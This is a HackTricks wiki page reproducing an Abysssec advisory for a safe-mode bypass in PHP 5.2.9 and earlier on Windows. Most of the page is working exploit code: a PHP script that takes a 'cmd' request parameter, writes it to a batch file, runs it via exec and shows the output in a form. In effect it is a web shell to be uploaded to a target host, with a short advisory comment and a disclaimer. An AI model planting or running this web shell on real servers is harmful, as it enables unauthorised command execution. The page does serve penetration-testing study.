Skip to content

[AD REMOVED]

PHP <= 5.2.9 on windows

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

{{#tabs}} {{#tab name="exploit.php"}}

<?php
//cmd.php
/*
    Abysssec Inc Public Advisory

    Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
    the problem comes from OS behavior - implement  and interfacing between php
    and operation systems directory structure . the problem is php won't tell difference
    between directory browsing in linux and windows this can lead attacker to ability
    execute his / her commands on targert machie even in SafeMod On  (php.ini setting) .
    =============================================================================
    in linux when you want open a directory for example php directory you need
    to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell
    diffence between slash and back slash it means there is no didffrence  between
    c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple
    php implement "\" character can escape safemode using  function like excec .
    here is a PoC for discussed vulnerability . just upload files on your target host and execute
    your commands .
    ==============================================================================
    note : this vulnerabities is just for educational purpose and author will be not be responsible
    for any damage using this vulnerabilty.
    ==============================================================================
    for more information visit Abysssec.com
    feel free to contact me at admin [at] abysssec.com
*/
    $cmd = $_REQUEST['cmd'];
    if ($cmd){
    $batch = fopen ("cmd.bat","w");
    fwrite($batch,"$cmd>abysssec.txt"."\r\n");
    fwrite($batch,"exit");
    fclose($batch);
    exec("\start cmd.bat");
    echo "<center>";
    echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
    echo "<textarea rows=20 cols=60>";
    require("abysssec.txt");
    echo "</textarea>";
    echo "</center>";
    }
?>

<html>
<body bgcolor=#000000 and text=#DO0000>
<center>
<form method=post>
<input type=text name=cmd >
<input type=submit value=bypass>
</form>
</center>
</body>
</html>

{{#endtab}}

{{#tab name="cmd.bat"}}

dir > abyss.txt
exit

{{#endtab}} {{#endtabs}}

[AD REMOVED]

All content on this page is from HackTricks, which belongs to Carlos Polop and is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license unless otherwise specified. This page is generated from the HackTricks wiki and just has the ads removed.